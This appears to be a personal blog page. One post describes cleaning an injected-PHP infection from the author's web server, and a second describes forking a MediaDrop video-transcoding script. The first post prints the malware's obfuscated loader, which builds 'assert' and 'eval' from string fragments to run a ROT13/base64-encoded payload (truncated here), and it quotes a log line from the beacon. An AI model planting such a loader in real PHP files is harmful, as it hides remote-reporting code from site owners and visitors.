Battle against injected PHP

My main personal web server became infected with some effin malware that was injected it very nearly every single .php script on the server. The injected code was basically:

//###=CACHE START=###

$strings = "as"; $strings .= "se";  $strings .= "rt"; $strings2 = "st"; $strings2 .= "r_r";  $strings2 .= "ot13"; $gbz = "riny(".$strings2("base64_decode");
$light =  $strings2($gbz.'("nJLtX...."));'); $strings($light);
//###=CACHE END=###

This is kind of beautiful to me, it took me a little while to figure out what it does. In effect it causes basic system info for anyone browsing sites on that server to be sent off to some other php script on another server. At first I altered the server and my network to prevent any traffic from reaching the intended target. Instead I captured the traffic so I could get a look at the volume of it. Here’s an example apache log message generated by someone browsing an infected site:

- ( - - [13/Nov/2016:14:01:20 -0700] "GET /get.php?ip= HTTP/1.0" 404 466 "-" "-"

After kind of a lot of effort, I came up with a script that purged this malware from my server’s file system. SUuuuuure I could have restored from backup, but that’s not nearly as interesting or dangerous.

Here’s the searchAndDestroy script I came up with.

Software > MediaDrop Automatic Transcoding Script

I’ve been working on a somewhat private personal website intended for sharing of family videos. I’ve converted roughly 200hrs of old family video tapes in to media files and am well on my way to having converted the files in to individual scenes/clips. The content is being shared, with family, using an instant of the web application “MediaDrop”. I love this web application. It’s epic. I was just looking for a podcast feed generator and I found a lot more in MediaDrop.

I then got sort of obsessed with this cool web app and eventually having family members upload their own videos. The problem was I need the format of the content to be normalized such that it’ll cooperate over the podcast feed. After all, these are meant to be easily viewed on Apple TVs. I found a script for this job, as MediaDrop doesn’t transcode. Only the script kind of sucked for my purposes. So I forked it!

Check out my first github project here:

It automatically transcodes uploaded videos to MP4 files, compatible with Apple TV3 devices.